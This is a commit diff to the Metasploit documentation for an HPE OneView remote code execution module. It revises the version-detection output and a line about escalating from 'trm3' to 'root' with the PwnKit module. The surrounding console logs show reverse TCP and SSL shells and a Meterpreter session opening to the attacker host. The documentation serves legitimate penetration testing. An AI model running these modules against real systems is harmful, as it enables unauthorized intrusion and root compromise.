Skip to content

Commit d40a35a

Browse files
committed
the version logic changes, update the docs
1 parent 0c947d0 commit d40a35a

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

documentation/modules/exploit/linux/http/hpe_oneview_rce.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -107,11 +107,11 @@ Exploit target:
107107
View the full module info with the info, or info -d command.
108108
109109
msf exploit(linux/http/hpe_oneview_rce) > check
110-
[+] 192.168.86.141:443 - The target is vulnerable. Detected HPE OneView version 6.60 (API version 3800).
110+
[+] 192.168.86.141:443 - The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691
111111
msf exploit(linux/http/hpe_oneview_rce) > exploit
112112
[*] Started reverse TCP handler on 192.168.86.122:4444
113113
[*] Running automatic check ("set AutoCheck false" to disable)
114-
[+] The target is vulnerable. Detected HPE OneView version 6.60 (API version 3800).
114+
[+] The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691
115115
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.141:22164) at 2025-12-19 12:21:36 +0000
116116
117117
meterpreter > getuid
@@ -170,7 +170,7 @@ View the full module info with the info, or info -d command.
170170
msf exploit(linux/http/hpe_oneview_rce) > exploit
171171
[*] Started reverse SSL handler on 192.168.86.122:4444
172172
[*] Running automatic check ("set AutoCheck false" to disable)
173-
[+] The target is vulnerable. Detected HPE OneView version 6.60 (API version 3800).
173+
[+] The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691
174174
[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.141:22420) at 2025-12-19 12:22:58 +0000
175175
176176
id
@@ -184,7 +184,7 @@ pwd
184184
### Example 3 (LPE)
185185

186186
This example shows how we can use an existing Meterpreter session on an HPE OneView version `6.60.07` device, to
187-
escalate privileges to root via the `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module.
187+
escalate privileges from `trm3` to `root` via the `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module.
188188

189189
```
190190
msf exploit(linux/http/hpe_oneview_rce) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

0 commit comments

Comments
 (0)